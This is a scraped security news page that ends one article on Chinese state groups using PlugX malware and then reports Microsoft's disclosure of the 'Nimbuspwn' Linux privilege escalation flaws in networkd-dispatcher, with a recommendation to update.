![CyberSecurity](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj6zHdXd3qpCksF0nkMkrjsOzaw-cxZGPHWoTEp9y7VPIeyPBFGsmIyIX8NTkqI1IDqnIXYnsZuIh4rc9f8TNUn7ndAZqtXc-t58X2oueTaL4Ijb4hgH-b183QvQ0ienXIipuOsqeLP5b8I2prKmp0RWvdZQgnKehVRKbqRQpin1JgfwlZeE_IB4EmesQ/s1600/crowdsec-728.jpg)

"Targeting Russian-speaking users and European entities suggests that the threat actors have received updated tasking that reflects the changing intelligence collection requirements of the \[People's Republic of China\]," the researchers said.

The findings come weeks after another China-based nation-state group known as Nomad Panda (aka RedFoxtrot) was linked with medium confidence to attacks against defense and telecom sectors in South Asia by leveraging yet another version of PlugX dubbed Talisman.

"PlugX has been associated with various Chinese actors in recent years," Trellix noted last month. "This fact raises the question if the malware's code base is shared among different Chinese state-backed groups."

"On the other hand, the alleged leak of the PlugX v1 builder, as reported by Airbus in 2015, indicates that not all occurrences of PlugX are necessarily tied to Chinese actors," the cybersecurity company added.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Targeting Russian Military Personnel with Updated PlugX Malware 

Microsoft on Tuesday disclosed a set of two privilege escalation vulnerabilities in the Linux operating system that could potentially allow threat actors to carry out an array of nefarious activities.
Collectively called "Nimbuspwn," the flaws "can be chained together to gain root privileges on Linux systems, allowing attackers to deploy payloads, like a root backdoor, and perform other

![Privilege Escalation Flaws in Linux](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhG_jhh9hiswd2AzsR0aCo4MuEub8YtwWhf1ShIH_fynCfsJrWmtt2F85IXLzhTGtMEUD27Op_s2CnLgthjsCDhzTZWerBz5aaATkEYPH4sohkYbIUlb4DAGeEH1EF2H5_bIoqCvljCcU39hjYuYJuiErrVsn1WgPwMyHpOL9ZNHNy6jRL_HeTPxG_P/s728-e1000/linux-1.jpg "Privilege Escalation Flaws in Linux")

Microsoft on Tuesday disclosed a set of two privilege escalation vulnerabilities in the Linux operating system that could potentially allow threat actors to carry out an array of nefarious activities.

Collectively called "**Nimbuspwn**," the flaws "can be chained together to gain root privileges on Linux systems, allowing attackers to deploy payloads, like a root backdoor, and perform other malicious actions via arbitrary root code execution," Jonathan Bar Or of the Microsoft 365 Defender Research Team said in a report.

![CyberSecurity](https://thehackernews.com/images/-SmHk9U6ikBk/YVHUUpxrNfI/AAAAAAAA4ac/xluSCU7878ErhlmIN9mj9pKf9fr3LTBwACLcBGAsYHQ/s300-e100/rewind-3-300.png)

On top of that, the defects — tracked as **CVE-2022-29799 and CVE-2022-29800** — could also be weaponized as a vector for root access to deploy more sophisticated threats such as ransomware.

The vulnerabilities are rooted in a systemd component called networkd-dispatcher, a daemon program for the network manager system service that's designed to dispatch network status changes.

![Privilege Escalation Flaws in Linux](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhVJDKavu6WCDP6IGF4F0G_sv-BbtjlKBhwhUC_JFsQKeZqoRBzFtxfMTeE5_PGpBJOx9OQm_TcJR6mjVi5OuNx9mE1LjwbVcMg9c-xZgCFkkGOB1aMQQnVDGhXPPpKOljAJeFldyneILzyLR7BZwQVeWJZfshu44s9XBov1nLQpS0FIrdFV8KOwOhy/s728-e1000/linux.jpg "Privilege Escalation Flaws in Linux")

Specifically, they relate to a combination of directory traversal (CVE-2022-29799), symbolic link (aka symlink) race, and time-of-check to time-of-use (CVE-2022-29800) flaws, leading to a scenario where an adversary in control of a rogue D-Bus service can plant and execute malicious backdoors on the compromised endpoints.

![CyberSecurity](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj6zHdXd3qpCksF0nkMkrjsOzaw-cxZGPHWoTEp9y7VPIeyPBFGsmIyIX8NTkqI1IDqnIXYnsZuIh4rc9f8TNUn7ndAZqtXc-t58X2oueTaL4Ijb4hgH-b183QvQ0ienXIipuOsqeLP5b8I2prKmp0RWvdZQgnKehVRKbqRQpin1JgfwlZeE_IB4EmesQ/s1600/crowdsec-728.jpg)

Users of networkd-dispatcher are highly recommended to update their instances to the latest version to mitigate potential arising out of exploiting the flaws.

"The growing number of vulnerabilities on Linux environments emphasize the need for strong monitoring of the platform's operating system and its components," Bar Or said.

"This constant bombardment of attacks spanning a wide range of platforms, devices, and other domains emphasizes the need for a comprehensive and proactive vulnerability management approach that can further identify and mitigate even previously unknown exploits and issues."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#backdoor